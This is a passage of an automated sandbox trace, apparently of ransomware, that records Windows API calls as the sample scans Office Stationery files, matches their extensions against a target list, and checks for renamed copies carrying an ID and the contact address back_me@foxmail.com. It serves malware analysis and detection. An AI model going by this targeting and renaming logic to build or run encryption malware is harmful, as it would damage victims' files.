Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.893] lstrlenW (lpString=".1cd") returned 4 [0044.893] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0044.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(cm).wmf") returned 71 [0044.893] lstrlenW (lpString=".jpg") returned 4 [0044.893] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0044.893] lstrcmpiW (lpString1=".wmf", lpString2=".php") returned 1 [0044.893] lstrlenW (lpString="grid_(inch).wmf") returned 15 [0044.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0044.893] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=7498) returned 1 [0044.893] CloseHandle (hObject=0x1b0) returned 1 [0044.893] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf")) returned 0x20 [0044.893] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.893] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.894] lstrlenW (lpString=".doc") returned 4 [0044.894] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0044.894] lstrlenW (lpString=".docx") returned 5 [0044.894] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0044.894] lstrlenW (lpString=".pdf") returned 4 [0044.894] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0044.894] lstrlenW (lpString=".xls") returned 4 [0044.894] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0044.894] lstrlenW (lpString=".xlsx") returned 5 [0044.894] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0044.894] lstrlenW (lpString=".ppt") returned 4 [0044.894] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0044.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.894] lstrlenW (lpString=".zip") returned 4 [0044.894] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0044.894] lstrlenW (lpString=".rar") returned 4 [0044.894] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0044.894] lstrlenW (lpString=".bz2") returned 4 [0044.894] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0044.894] lstrlenW (lpString=".7z") returned 3 [0044.894] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0044.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.894] lstrlenW (lpString=".dbf") returned 4 [0044.894] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0044.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.894] lstrlenW (lpString=".1cd") returned 4 [0044.894] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0044.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.894] lstrlenW (lpString=".jpg") returned 4 [0044.894] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0044.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.895] lstrlenW (lpString=".doc") returned 4 [0044.895] lstrcmpiW (lpString1=".doc", lpString2=".wmf") returned -1 [0044.895] lstrlenW (lpString=".docx") returned 5 [0044.895] lstrcmpiW (lpString1=".docx", lpString2=").wmf") returned 1 [0044.895] lstrlenW (lpString=".pdf") returned 4 [0044.895] lstrcmpiW (lpString1=".pdf", lpString2=".wmf") returned -1 [0044.895] lstrlenW (lpString=".xls") returned 4 [0044.895] lstrcmpiW (lpString1=".xls", lpString2=".wmf") returned 1 [0044.895] lstrlenW (lpString=".xlsx") returned 5 [0044.895] lstrcmpiW (lpString1=".xlsx", lpString2=").wmf") returned 1 [0044.895] lstrlenW (lpString=".ppt") returned 4 [0044.895] lstrcmpiW (lpString1=".ppt", lpString2=".wmf") returned -1 [0044.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.895] lstrlenW (lpString=".zip") returned 4 [0044.895] lstrcmpiW (lpString1=".zip", lpString2=".wmf") returned 1 [0044.895] lstrlenW (lpString=".rar") returned 4 [0044.895] lstrcmpiW (lpString1=".rar", lpString2=".wmf") returned -1 [0044.895] lstrlenW (lpString=".bz2") returned 4 [0044.895] lstrcmpiW (lpString1=".bz2", lpString2=".wmf") returned -1 [0044.895] lstrlenW (lpString=".7z") returned 3 [0044.895] lstrcmpiW (lpString1=".7z", lpString2="wmf") returned -1 [0044.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.895] lstrlenW (lpString=".dbf") returned 4 [0044.895] lstrcmpiW (lpString1=".dbf", lpString2=".wmf") returned -1 [0044.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.895] lstrlenW (lpString=".1cd") returned 4 [0044.895] lstrcmpiW (lpString1=".1cd", lpString2=".wmf") returned -1 [0044.895] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\grid_(inch).wmf") returned 73 [0044.895] lstrlenW (lpString=".jpg") returned 4 [0044.895] lstrcmpiW (lpString1=".jpg", lpString2=".wmf") returned -1 [0044.896] lstrcmpiW (lpString1=".htm", lpString2=".php") returned -1 [0044.896] lstrlenW (lpString="Hand Prints.htm") returned 15 [0044.896] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0044.902] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=235) returned 1 [0044.902] CloseHandle (hObject=0x1b0) returned 1 [0044.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm")) returned 0x20 [0044.902] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.902] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.902] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.902] lstrlenW (lpString=".doc") returned 4 [0044.902] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0044.903] lstrlenW (lpString=".docx") returned 5 [0044.903] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0044.903] lstrlenW (lpString=".pdf") returned 4 [0044.903] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0044.903] lstrlenW (lpString=".xls") returned 4 [0044.903] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0044.903] lstrlenW (lpString=".xlsx") returned 5 [0044.903] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0044.903] lstrlenW (lpString=".ppt") returned 4 [0044.903] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0044.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.903] lstrlenW (lpString=".zip") returned 4 [0044.903] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0044.903] lstrlenW (lpString=".rar") returned 4 [0044.903] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0044.903] lstrlenW (lpString=".bz2") returned 4 [0044.903] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0044.903] lstrlenW (lpString=".7z") returned 3 [0044.903] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0044.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.903] lstrlenW (lpString=".dbf") returned 4 [0044.903] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0044.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.903] lstrlenW (lpString=".1cd") returned 4 [0044.903] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0044.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.903] lstrlenW (lpString=".jpg") returned 4 [0044.903] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0044.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.903] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.903] lstrlenW (lpString=".doc") returned 4 [0044.903] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0044.903] lstrlenW (lpString=".docx") returned 5 [0044.903] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0044.904] lstrlenW (lpString=".pdf") returned 4 [0044.904] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0044.904] lstrlenW (lpString=".xls") returned 4 [0044.904] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0044.904] lstrlenW (lpString=".xlsx") returned 5 [0044.904] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0044.904] lstrlenW (lpString=".ppt") returned 4 [0044.904] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0044.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.904] lstrlenW (lpString=".zip") returned 4 [0044.904] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0044.904] lstrlenW (lpString=".rar") returned 4 [0044.904] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0044.904] lstrlenW (lpString=".bz2") returned 4 [0044.904] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0044.904] lstrlenW (lpString=".7z") returned 3 [0044.904] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0044.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.904] lstrlenW (lpString=".dbf") returned 4 [0044.904] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0044.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.904] lstrlenW (lpString=".1cd") returned 4 [0044.904] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0044.904] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Hand Prints.htm") returned 73 [0044.904] lstrlenW (lpString=".jpg") returned 4 [0044.904] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0044.904] lstrcmpiW (lpString1=".jpg", lpString2=".php") returned -1 [0044.904] lstrlenW (lpString="HandPrints.jpg") returned 14 [0044.904] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0044.905] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=4222) returned 1 [0044.905] CloseHandle (hObject=0x1b0) returned 1 [0044.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg")) returned 0x20 [0044.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.905] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.905] lstrlenW (lpString=".doc") returned 4 [0044.905] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0044.905] lstrlenW (lpString=".docx") returned 5 [0044.905] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0044.905] lstrlenW (lpString=".pdf") returned 4 [0044.905] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0044.905] lstrlenW (lpString=".xls") returned 4 [0044.905] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0044.905] lstrlenW (lpString=".xlsx") returned 5 [0044.905] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0044.905] lstrlenW (lpString=".ppt") returned 4 [0044.905] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0044.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.905] lstrlenW (lpString=".zip") returned 4 [0044.906] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0044.906] lstrlenW (lpString=".rar") returned 4 [0044.906] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0044.906] lstrlenW (lpString=".bz2") returned 4 [0044.906] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0044.906] lstrlenW (lpString=".7z") returned 3 [0044.906] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.906] lstrlenW (lpString=".dbf") returned 4 [0044.906] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.906] lstrlenW (lpString=".1cd") returned 4 [0044.906] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.906] lstrlenW (lpString=".jpg") returned 4 [0044.906] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.906] lstrlenW (lpString=".doc") returned 4 [0044.906] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0044.906] lstrlenW (lpString=".docx") returned 5 [0044.906] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0044.906] lstrlenW (lpString=".pdf") returned 4 [0044.906] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0044.906] lstrlenW (lpString=".xls") returned 4 [0044.906] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0044.906] lstrlenW (lpString=".xlsx") returned 5 [0044.906] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0044.906] lstrlenW (lpString=".ppt") returned 4 [0044.906] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0044.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.906] lstrlenW (lpString=".zip") returned 4 [0044.906] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0044.906] lstrlenW (lpString=".rar") returned 4 [0044.907] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0044.907] lstrlenW (lpString=".bz2") returned 4 [0044.907] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0044.907] lstrlenW (lpString=".7z") returned 3 [0044.907] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.907] lstrlenW (lpString=".dbf") returned 4 [0044.907] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.907] lstrlenW (lpString=".1cd") returned 4 [0044.907] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0044.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\HandPrints.jpg") returned 72 [0044.907] lstrlenW (lpString=".jpg") returned 4 [0044.907] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0044.907] lstrcmpiW (lpString1=".emf", lpString2=".php") returned -1 [0044.907] lstrlenW (lpString="Memo.emf") returned 8 [0044.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0044.908] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=152300) returned 1 [0044.908] CloseHandle (hObject=0x1b0) returned 1 [0044.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf")) returned 0x20 [0044.908] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\memo.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0044.908] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0044.908] lstrlenW (lpString=".doc") returned 4 [0044.908] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1 [0044.908] lstrlenW (lpString=".docx") returned 5 [0044.908] lstrcmpiW (lpString1=".docx", lpString2="o.emf") returned -1 [0044.908] lstrlenW (lpString=".pdf") returned 4 [0044.908] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1 [0044.908] lstrlenW (lpString=".xls") returned 4 [0044.908] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1 [0044.909] lstrlenW (lpString=".xlsx") returned 5 [0044.909] lstrcmpiW (lpString1=".xlsx", lpString2="o.emf") returned -1 [0044.909] lstrlenW (lpString=".ppt") returned 4 [0044.909] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1 [0044.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0044.909] lstrlenW (lpString=".zip") returned 4 [0044.909] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1 [0044.909] lstrlenW (lpString=".rar") returned 4 [0044.909] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1 [0044.909] lstrlenW (lpString=".bz2") returned 4 [0044.909] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1 [0044.909] lstrlenW (lpString=".7z") returned 3 [0044.909] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1 [0044.909] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Memo.emf") returned 66 [0044.909] lstrlenW (lpString=".dbf") returned 4 [0044.909] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1 [0044.911] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2209) returned 1 [0044.911] CloseHandle (hObject=0x1b0) returned 1 [0044.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg")) returned 0x20 [0044.911] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.912] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.912] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=4192) returned 1 [0044.912] CloseHandle (hObject=0x1b0) returned 1 [0044.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf")) returned 0x20 [0044.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.912] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Month_Calendar.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\month_calendar.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.913] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=26036) returned 1 [0044.913] CloseHandle (hObject=0x1b0) returned 1 [0044.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf")) returned 0x20 [0044.913] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.914] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Music.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\music.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.914] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2950) returned 1 [0044.914] CloseHandle (hObject=0x1b0) returned 1 [0044.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg")) returned 0x20 [0044.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Notebook.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\notebook.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.915] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=237) returned 1 [0044.915] CloseHandle (hObject=0x1b0) returned 1 [0044.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0x20 [0044.915] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.915] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.916] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=6381) returned 1 [0044.916] CloseHandle (hObject=0x1b0) returned 1 [0044.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg")) returned 0x20 [0044.916] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 